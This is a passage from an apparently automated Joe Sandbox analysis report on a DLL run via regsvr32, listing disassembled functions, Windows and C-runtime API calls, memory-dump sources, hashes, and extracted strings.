                                                                    • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                    • String ID:
                                                                    • API String ID: 1549890855-0
                                                                    • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                    • Instruction ID: 202dac84b0809f9244e0ca614498e95aff72b8fba79befded7f25c502a160664
                                                                    • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                    • Instruction Fuzzy Hash: 1F31AB20E0D70391FB78AFA178AF2BA21959F557D4F1041F4DA3DC96E2EE2CB44C5222
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • _getptd.LIBCMT ref: 00007FF8CA9B4CF3
                                                                      • Part of subcall function 00007FF8CA9B497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FF8CA9B4D0E,?,?,?,?,?,00007FF8CA9B4EE3), ref: 00007FF8CA9B49A6
                                                                      • Part of subcall function 00007FF8CA9B309C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    • free.LIBCMT ref: 00007FF8CA9B4D7F
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B4DB7
                                                                    • free.LIBCMT ref: 00007FF8CA9B4E67
                                                                    • free.LIBCMT ref: 00007FF8CA9B4E97
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B4E9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                    • String ID:
                                                                    • API String ID: 1264244385-0
                                                                    • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                    • Instruction ID: 79ba7fdb18ba393eac935a8fc6b3cfc01cca47f35e88c9432f72cd8e1bb06993
                                                                    • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                    • Instruction Fuzzy Hash: D651AC31908B4286E7609F65B42A2B9B7A1FBC4BD8F1442B6D66E83395CF3CE409D704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 502529563-0
                                                                    • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                    • Instruction ID: f617e944d5640d0a7101eb83c6c3fc81e892af7480081c24e5f42b5773ed52e1
                                                                    • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                    • Instruction Fuzzy Hash: A8114C21A0975281FB206F61B86A2BA3291DF84BD0F0452B0EB3D877C2CE3CF4488711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                    • String ID: vb4vcW2kAW3Twaz?30
                                                                    • API String ID: 254689257-4179232793
                                                                    • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                    • Instruction ID: e55e1f7f4986706372130b7cf02d153578273b484cddb23457f56dfae817c361
                                                                    • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                    • Instruction Fuzzy Hash: 9621053260CF8286E7308F14F4693AA77A5FB88788F0045B5CADD83765DF7DA5098B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B36F0: _initp_misc_winsig.LIBCMT ref: 00007FF8CA9B3729
                                                                      • Part of subcall function 00007FF8CA9B36F0: EncodePointer.KERNEL32(?,?,?,00007FF8CA9B2FAB,?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B3745
                                                                    • FlsAlloc.KERNEL32(?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B2FBB
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B2FEC
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8CA9B3000
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 54287522-0
                                                                    • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                    • Instruction ID: 5a526164dcd51689f87691974bfd4e654d9fc832474b8655675707f6429635c5
                                                                    • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                    • Instruction Fuzzy Hash: FA014420E08B0341FB34EF71B82F27522A19F057E0F1442B4D53DC62E1EE2CA44DD221
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: :}
                                                                    • API String ID: 963392458-2902022129
                                                                    • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                    • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                    • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                    • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID: JKvDDasqwOPvGXZdqW
                                                                    • API String ID: 621844428-4059861069
                                                                    • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                    • Instruction ID: a3c66bf4d30574f34297a8570581242f6b58086028b6d812d26de4b6d8c548e6
                                                                    • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                    • Instruction Fuzzy Hash: 3FD09E21A58B8182D6209B10F85A35A63B0FB99388F800170D5DC86624DF7CD15AC704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _errno.LIBCMT ref: 00007FF8CA9B6D0F
                                                                      • Part of subcall function 00007FF8CA9B66D8: DecodePointer.KERNEL32 ref: 00007FF8CA9B66FF
                                                                    • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FF8CA9B313B,?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF), ref: 00007FF8CA9B6D58
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateDecodeHeapPointer_errno
                                                                    • String ID:
                                                                    • API String ID: 15861996-0
                                                                    • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                    • Instruction ID: dc1e15c33125aa3f2f4ed88b9ff7a18a65a00ada06547983496037db19f0226b
                                                                    • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                    • Instruction Fuzzy Hash: 6D119126B0934286FB655F25FA6E3B962D19F807E4F088A74CB3D876C4DE7CB4488600
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _initp_misc_winsig.LIBCMT ref: 00007FF8CA9B3729
                                                                      • Part of subcall function 00007FF8CA9B755C: EncodePointer.KERNEL32(?,?,?,?,00007FF8CA9B373E,?,?,?,00007FF8CA9B2FAB,?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B7567
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B2FAB,?,?,?,00007FF8CA9B2179), ref: 00007FF8CA9B3745
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer$_initp_misc_winsig
                                                                    • String ID:
                                                                    • API String ID: 190222155-0
                                                                    • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                    • Instruction ID: 1dda6143daeeec70ce7cf795af670fc44eb10a2a950537326ee6afa1a61affd4
                                                                    • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                    • Instruction Fuzzy Hash: F4F02214E8A74740EE29FF62787B1F822404F96BC0B8821F4E92E9A3D3DD6CE5598754
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CreateInformation
                                                                    • String ID:
                                                                    • API String ID: 1774340351-0
                                                                    • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                    • Instruction ID: 534d04f972ddaa9814ab5bed5f1183a5713604be2f9022ae569a49d19499db90
                                                                    • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                    • Instruction Fuzzy Hash: F1E04F75E25B9183E798AF21B86E7696250FB98384F805079EA5E82794DF3CD0498B10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B34AF,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B740D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                    • Instruction ID: eae910700445f82e42901b8eca9046a0228bafb851ec09d70bfb24d5d46d259a
                                                                    • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                    • Instruction Fuzzy Hash: D3D01222F58A4182DB208F25F5A62A83265EB84BD4F589071D66C46645DD2CC45A8701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 1068366078-0
                                                                    • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                    • Instruction ID: 84d9ac298652287cda40fc3205a989951b6c3fe009229469df5dde672fdd809f
                                                                    • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                    • Instruction Fuzzy Hash: 4301A222A24B8186EB549F16B86502AB6A5FB88FD0F084171DE6D43B50DF38E859C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B6C34: _FF_MSGBANNER.LIBCMT ref: 00007FF8CA9B6C64
                                                                      • Part of subcall function 00007FF8CA9B6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3), ref: 00007FF8CA9B6C89
                                                                      • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CAD
                                                                      • Part of subcall function 00007FF8CA9B6C34: _errno.LIBCMT ref: 00007FF8CA9B6CB8
                                                                    • Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$AllocateHeapSleep
                                                                    • String ID:
                                                                    • API String ID: 4153772858-0
                                                                    • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                    • Instruction ID: 8a3f63257d62c0fc72354ee1441a3c692975470ea54d03697f871525fcce37c1
                                                                    • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                    • Instruction Fuzzy Hash: 82F0C232A19B8582EA60DF16B46612E7260FB84BD0F440174EA6D83B55DF3CE89A8700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1446610345-0
                                                                    • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                    • Instruction ID: 68a5a8a46f85fdd35c0f2e147da662dcb24fa8216fb3520e1942ede157edd372
                                                                    • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                    • Instruction Fuzzy Hash: 82F1D472A087418AE7309F21F46A1A977D1FB487D8F548675EA2D87B94DF3CE9488700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                    • String ID: ADVAPI32.DLL$SystemFunction036
                                                                    • API String ID: 1558914745-1064046199
                                                                    • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                    • Instruction ID: 7da2887ccf4cdb88b9c44d835f2f9540514ffd3c193f9974934ef7a7391c87e5
                                                                    • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                    • Instruction Fuzzy Hash: 82314F21A09B4286FB20AF65B47F3B92291AF447C4F4445B8DA6DCB796DE3CE44D8701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
• String ID: Norwegian-Nynorsk
• API String ID: 2273835618-461349085
• Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
• Instruction ID: 022a858950a919205c0d5e14b3eef94f33e90cd5aad6ac9d5fcc6b5096194e80
• Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
• Instruction Fuzzy Hash: 6C616362A0874286FB749F21F46A3792790EF48BC4F0841B6DA6DC62D4DF7CE948C395
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: FormatTime$__ascii_stricmpfree
• String ID: a/p$am/pm
• API String ID: 2252689280-3206640213
• Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
• Instruction ID: 90d34fa1669d2016d8456f6d07e0629822ccadd0427fdf7777da2f12b07249d1
• Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
• Instruction Fuzzy Hash: 5BF1D32291879285E7748F24B47E97C67A1FB067C4F5490B6EAADC7AC5DE3CA84CC301
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B6FCF
• GetStdHandle.KERNEL32(?,?,?,?,?,00007FF8CA9B7194,?,?,?,?,00007FF8CA9B6C69,?,?,00000000,00007FF8CA9B30C0), ref: 00007FF8CA9B70DB
• WriteFile.KERNEL32 ref: 00007FF8CA9B7115
Strings
Memory Dump Source
• Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
• Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
• Instruction ID: 9ed83278d85365a38664fe785b1cf37550ca2e48b587d900000d5265e8eee0be
• Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
• Instruction Fuzzy Hash: C251A925A18B4241FB34DF25B97F7BA2251AF857C8F4046B6DA2DC6AD6DF3CE10D8210
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
